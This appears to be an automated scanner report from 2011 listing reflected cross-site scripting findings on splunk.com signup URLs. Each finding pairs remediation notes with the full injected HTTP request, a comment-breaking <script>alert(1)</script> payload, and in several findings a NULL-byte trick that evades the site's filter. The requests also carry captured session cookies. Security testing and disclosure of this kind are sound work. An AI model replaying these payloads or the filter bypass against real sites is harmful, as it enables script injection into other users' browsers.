Cookie: Enabled=true; Apache=173.193.214.243.1296942930878168; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=k9q26g5j81mb2osf77dbi672t5; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 22:35:20 GMT
Server: Apache/2.2.8 (EL)
Vary: Host,Accept-Encoding,User-Agent
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18340

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 4 is copied into an HTML comment. The payload %0088885--><script>alert(1)</script>01d4ba0ba72 was submitted in the REST URL parameter 4. This input was echoed as 88885--><script>alert(1)</script>01d4ba0ba72 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /page/securelink/signup/Splunk_Executive_Brief%0088885--><script>alert(1)</script>01d4ba0ba72 HTTP/1.1
Host: www.splunk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Enabled=true; Apache=173.193.214.243.1296942930878168; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=k9q26g5j81mb2osf77dbi672t5; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
The value of REST URL parameter 1 is copied into an HTML comment. The payload 34cda--><script>alert(1)</script>d78e48f3c63 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /page34cda--><script>alert(1)</script>d78e48f3c63/securelink/signup/Splunk_Product_Datasheet HTTP/1.1
Host: www.splunk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Enabled=true; Apache=173.193.214.243.1296942930878168; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=k9q26g5j81mb2osf77dbi672t5; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
The value of REST URL parameter 2 is copied into an HTML comment. The payload 8a3fb--><script>alert(1)</script>e6d68dbfae3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /page/securelink8a3fb--><script>alert(1)</script>e6d68dbfae3/signup/Splunk_Product_Datasheet HTTP/1.1
Host: www.splunk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Enabled=true; Apache=173.193.214.243.1296942930878168; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=k9q26g5j81mb2osf77dbi672t5; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 22:35:20 GMT
Server: Apache/2.2.8 (EL)
Vary: Host,Accept-Encoding,User-Agent
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18348

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 4 is copied into an HTML comment. The payload %00cf113--><script>alert(1)</script>dde257ca350 was submitted in the REST URL parameter 4. This input was echoed as cf113--><script>alert(1)</script>dde257ca350 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /page/securelink/signup/Splunk_Product_Datasheet%00cf113--><script>alert(1)</script>dde257ca350 HTTP/1.1
Host: www.splunk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Enabled=true; Apache=173.193.214.243.1296942930878168; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=k9q26g5j81mb2osf77dbi672t5; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
The value of REST URL parameter 1 is copied into an HTML comment. The payload 5f1c8--><script>alert(1)</script>3cece97f3e5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /page5f1c8--><script>alert(1)</script>3cece97f3e5/securelink/signup/Splunk_and_MapReduce HTTP/1.1
Host: www.splunk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Enabled=true; Apache=173.193.214.243.1296942930878168; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=k9q26g5j81mb2osf77dbi672t5; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
The value of REST URL parameter 2 is copied into an HTML comment. The payload 79b44--><script>alert(1)</script>119459f7b61 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /page/securelink79b44--><script>alert(1)</script>119459f7b61/signup/Splunk_and_MapReduce HTTP/1.1
Host: www.splunk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Enabled=true; Apache=173.193.214.243.1296942930878168; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=k9q26g5j81mb2osf77dbi672t5; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 22:35:20 GMT
Server: Apache/2.2.8 (EL)
Vary: Host,Accept-Encoding,User-Agent
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18332

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 4 is copied into an HTML comment. The payload %00a4177--><script>alert(1)</script>949938b3cf9 was submitted in the REST URL parameter 4. This input was echoed as a4177--><script>alert(1)</script>949938b3cf9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /page/securelink/signup/Splunk_and_MapReduce%00a4177--><script>alert(1)</script>949938b3cf9 HTTP/1.1
Host: www.splunk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Enabled=true; Apache=173.193.214.243.1296942930878168; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=k9q26g5j81mb2osf77dbi672t5; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
The value of REST URL parameter 1 is copied into an HTML comment. The payload 95c21--><script>alert(1)</script>e51e3e95e1f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /page95c21--><script>alert(1)</script>e51e3e95e1f/securelink/signup/The_Guide_to_Splunk_and_Operational_Intelligence HTTP/1.1
Host: www.splunk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Enabled=true; Apache=173.193.214.243.1296942930878168; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=k9q26g5j81mb2osf77dbi672t5; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 404 Not Found
Date: Sat, 05 Feb 2011 22:34:43 GMT
Server: Apache/2.2.8 (EL)
Vary: Host,Accept-Encoding,User-Agent
X-Powered-By: PHP/5.2.6
Expires: 0
Cache-Control: public, must-revalidate
Pragma: public
Set-Cookie: splunk_com_uid=1; expires=Sat, 05-Feb-2011 23:04:43 GMT; path=/
Set-Cookie: splunk_com_xt_uid=1; expires=Sat, 05-Feb-2011 23:04:43 GMT; path=/
ETag: f886534d84f3ba63e0ac405582532abf1296945283
Last-Modified: Sat, 05 Feb 2011 22:34:43 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18555

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into an HTML comment. The payload a4001--><script>alert(1)</script>b8a20fe60f9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /page/securelinka4001--><script>alert(1)</script>b8a20fe60f9/signup/The_Guide_to_Splunk_and_Operational_Intelligence HTTP/1.1
Host: www.splunk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Enabled=true; Apache=173.193.214.243.1296942930878168; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=k9q26g5j81mb2osf77dbi672t5; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 22:35:08 GMT
Server: Apache/2.2.8 (EL)
Vary: Host,Accept-Encoding,User-Agent
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18444

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 4 is copied into an HTML comment. The payload %003e830--><script>alert(1)</script>55ffcb1368b was submitted in the REST URL parameter 4. This input was echoed as 3e830--><script>alert(1)</script>55ffcb1368b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /page/securelink/signup/The_Guide_to_Splunk_and_Operational_Intelligence%003e830--><script>alert(1)</script>55ffcb1368b HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942930878168; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=k9q26g5j81mb2osf77dbi672t5; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
The value of REST URL parameter 1 is copied into an HTML comment. The payload 8335f--><script>alert(1)</script>bf8267006b1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /page8335f--><script>alert(1)</script>bf8267006b1/securityportal HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 22:13:05 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public Set-Cookie: splunk_com_uid=1; expires=Sat, 05-Feb-2011 22:43:05 GMT; path=/ Set-Cookie: splunk_com_xt_uid=1; expires=Sat, 05-Feb-2011 22:43:05 GMT; path=/ ETag: f9abaac05eff4ad22cd20a13d72af1311296943986 Last-Modified: Sat, 05 Feb 2011 22:13:06 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18347
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into an HTML comment. The payload 813b2--><script>alert(1)</script>84a6bb363c6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
